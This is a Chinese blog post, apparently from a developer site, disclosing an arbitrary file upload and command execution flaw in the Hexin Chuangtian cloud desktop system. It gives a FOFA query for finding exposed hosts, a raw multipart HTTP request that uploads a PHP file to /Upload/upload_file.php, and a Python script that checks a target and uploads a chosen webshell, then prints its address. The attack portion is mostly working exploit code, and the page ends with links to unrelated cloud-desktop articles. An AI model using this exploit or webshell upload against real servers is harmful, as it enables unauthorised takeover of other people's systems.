和信创天云桌面系统_命令执行_任意文件上传

简介: 和信创天云桌面系统_命令执行_任意文件上传

简介

和信下一代云桌面,是一款基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,融合帧传输(VDI)和流传输(VOI/IDV),构建既可以利用服务器的计算资源进行集中计算,又可以利用终端本身的资源进行分布计算的“前后端混合计算”模式,从而有效解决客户终端在集中管理、高效运维和安全可用等难题。

漏洞

和信创天云桌面系统存在命令执行_任意文件上传,可上传恶意文件获取服务器权限

FOFA

title="和信下一代云桌面VENGD"


474478cfb7ca1becb9c6693dda642ce0.png

复现

payload:


POST /Upload/upload_file.php?l=test HTTP/1.1
Host: X.X.X.X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/avif
<?php
phpinfo();
?>
------WebKitFormBoundaryfcKRltGv--


7a86dcabc15bad04e7741fc20e6f3231.png

393e5266d822b57aed797a2fddf37e66.png

成功利用

poc如下:(python版)

import requests
import time
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
# fofa :body="和信下一代云桌面"
p=input('请输入要上传的木马文件:')
i = open(p,'r+',encoding='utf-8')
pp = i.read()
url = 'http://xxx.xxx.xxx.xxx'
url1 = url + '/Upload/upload_file.php?l=test'
data = '''
------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="l.php"
Content-Type: image/avif
{}
------WebKitFormBoundaryfcKRltGv--
'''.format(pp)
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
    "Content-Type": "multipart/form-data;boundary=----WebKitFormBoundaryfcKRltGv"
}
r = requests.get(url=url1,verify=False,timeout = 10)
if r.status_code == 200 and '_Requst' in r.text:
    #print(r.text)
    t = requests.post(url = url1 ,headers=headers,data=data,verify=False,timeout = 10)
    #print(t.text)
    if t.status_code == 200 and '_Requst' in t.text:
        print('存在和信创天云桌面系统_命令执行_任意文件上传')
        print('正在上传木马文件')
        time.sleep(5)
        print('马子地址为:'+url+'/Upload/test/l.php')
    else:
        print(' {}不存在和信创天云桌面系统_命令执行_任意文件上传'.format(url))
else:
    print(' {}不存在和信创天云桌面系统_命令执行_任意文件上传'.format(url))


2fcc25c28826f05114f45aa91da3d4e9.png

e3a55b900963cf1fd5d24e84167303b1.png

相关文章
|
4月前
|
存储 负载均衡 安全
虚拟桌面和云桌面办公系统
虚拟桌面和云桌面办公系统
|
5月前
|
Linux 调度 开发工具
云桌面系统镜像文件快速分发方案分享SDK
为了解决云桌面环境下批量升级系统镜像的效率问题,传统的1对多FTP/HTTP方式因服务器带宽限制导致传输慢。一种基于优化的Bittorrent协议的P2P解决方案被提出,利用P2P技术将文件切块并让终端互相分享,提高下载速度,尤其适合大文件如256GB分区镜像的分发。通过自定义IO接口、跳过校验、超大分块、多分块支持及局域网自建Tracker等功能,实现更快的传输和镜像更新,适用于系统镜像、游戏更新等领域。该方案已广泛应用于各行业,可根据不同场景定制优化。
57 1
|
运维 安全 机器人
|
机器人 数据安全/隐私保护 Windows
云桌面上跑微信机器人,不需要一直开着windows系统了(部署运行机器人)
接上篇文章,本文主要介绍如何在云桌面上部署运行微信机器人
257 1
云桌面上跑微信机器人,不需要一直开着windows系统了(部署运行机器人)
|
存储 弹性计算 运维
阿里云无影云电脑是什么?无影云桌面和传统电脑有什么区别?
阿里云无影云电脑是什么?无影云桌面和传统电脑有什么区别?
431 3
阿里云无影云电脑是什么?无影云桌面和传统电脑有什么区别?
|
弹性计算 运维 安全
阿里云无影云电脑详细介绍(原无影云桌面)
阿里云无影云电脑详细介绍(原无影云桌面),什么是阿里云无影云电脑?无影云电脑(原云桌面)是一种快速构建、高效管理桌面办公环境,无影云电脑可用于远程办公、多分支机构、安全OA、短期使用、专业制图等使用场景,阿里云百科分享无影云桌面的详细介绍、租用价格、云电脑的优势、使用场景、网络架构、无影云电脑与云服务器的区别以及关于无影云电脑的常见问题解答FAQ
586 0
|
存储 弹性计算 移动开发
阿里无影云桌面连接云桌面方法
阿里无影云桌面连接云桌面方法,阿里云无影云桌面即无影云电脑,云电脑如何使用?云电脑购买后没有用户名和密码,先创建用户设置密码,才可以登录连接到云电脑。云电脑想要访问公网还需要开通互联网访问功能。阿里云百科来详细说下阿里云无影云电脑从购买、创建用户名密码和访问互联网全过程
273 0
|
存储 弹性计算 运维
无影云桌面和服务器的区别以及阿里云无影电脑的优势
无影云桌面和服务器的区别以及阿里云无影电脑的优势,阿里云无影云电脑和云服务器有什么区别?云电脑是作为个人或企业办公电脑使用,云服务器是对外提供24小时高可用服务,云电脑是桌面服务,云服务器是提供背后的计算服务,阿里云百科分享阿里云无影云电脑和云服务器的区别
|
存储 弹性计算 运维
阿里云无影云电脑(原云桌面)详细介绍
阿里云无影云电脑(原云桌面)详细介绍,阿里云推出无影云电脑,很多用户不清楚云电脑是什么,云电脑是一种安全高效的云上桌面服务,一般用于企业办公。云电脑支持快速便捷的桌面环境创建、部署、统一管控与运维。企业选择云电脑无需前期传统硬件投资,云电脑可以快速构建安全、高性能、低成本的企业桌面办公体系。阿里云百科来详细说下什么是无影云电脑以及云电脑和传统PC、VDI之间的区别
544 3
|
存储 弹性计算 运维
阿里云无影云电脑价格_企业办公型免费试用_云桌面优惠入口
阿里云无影云电脑价格_企业办公型免费试用_云桌面优惠入口
272 1